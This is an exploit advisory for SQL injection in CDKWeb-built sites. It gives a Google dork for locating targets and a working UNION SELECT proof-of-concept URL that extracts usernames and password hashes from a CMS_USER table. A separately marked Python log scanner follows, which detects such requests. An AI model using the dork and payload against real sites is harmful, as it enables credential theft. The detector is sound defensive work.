====
Exploit Author: Th3 R0cksT3r
====
# Exploit Title: CDKWeb SQL injection
# Date: 06.02.2014
# Email: th3rockst3r@gmail.com
# Vendor Homepage: http://www.cdkweb.com/
# Facebook: Facebook.com/thee.rocksTer
# Google Dork: inurl:.php?id= intext:Website Design and Web Development by CDKWeb
# Risk: High

=== Description ===
An attacker can retrieve database information through this vulnerability.

Proof Of Concept:
http://www.site.com/pressReleaseDetails.php?id=-136/%27+UNION+SELECT+1,2,3,4,group_concat%28id,0x3a,username,0x3a,password%29,6,7,8+from+CMS_USER--+

=== Solution ===
Upgrade to latest version.

# Greetz: Back Bone, Demon, Orions Hunter, Dark Knight Sparda, Gh0st KilL3r, Luge, Code Breaker, Darklord, Devil Prince, Rakhal Beduin, Bakeer Bhai, R007 C0D3, Dipto, 8l@ck 3xplor3r, Sparrow, Bd Matrix, Cyber Blader, Batchfweak and BD BLACK HAT
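
Added example (not part of the original advisory, and not vendor code): a Python check that scans web access logs for requests like the proof of concept above, where the id parameter of a .php page carries anything other than a plain integer. The log lines are constructed samples; the function names and the assumption that a legitimate id is always a non-negative integer are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (common log format); not real traffic.
# The second line carries the request from the advisory's proof of concept.
SAMPLE_LOG = [
    '203.0.113.5 - - [06/Feb/2014:10:00:01 +0000] "GET /pressReleaseDetails.php?id=136 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [06/Feb/2014:10:00:07 +0000] "GET /pressReleaseDetails.php?id=-136/%27+UNION+SELECT+1,2,3,4,group_concat%28id,0x3a,username,0x3a,password%29,6,7,8+from+CMS_USER--+ HTTP/1.1" 200 6204',
    '203.0.113.5 - - [06/Feb/2014:10:00:09 +0000] "GET /index.php HTTP/1.1" 200 2048',
]

# client address, request target and status code from one log line
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# UNION ... SELECT anywhere in the decoded parameter value
UNION_RE = re.compile(r'\bunion\b.+\bselect\b', re.I | re.S)


def classify_id(value):
    """Classify a decoded id value (assumption: valid ids are plain integers)."""
    if re.fullmatch(r'[0-9]+', value):
        return "ok"
    if UNION_RE.search(value):
        return "union-select"
    return "non-numeric"


def scan(lines, param="id"):
    """Return one finding per request whose `param` value is not a plain integer."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line this parser understands
        client, target, status = m.groups()
        parts = urlsplit(target)
        if not parts.path.lower().endswith(".php"):
            continue
        # parse_qs URL-decodes the value: %27 becomes ', + becomes a space
        for value in parse_qs(parts.query, keep_blank_values=True).get(param, []):
            verdict = classify_id(value)
            if verdict != "ok":
                findings.append({"client": client, "path": parts.path,
                                 "status": int(status), "verdict": verdict})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule, enforced in the application before the value reaches the query, is what removes the injection point; the log check only shows where it has been probed.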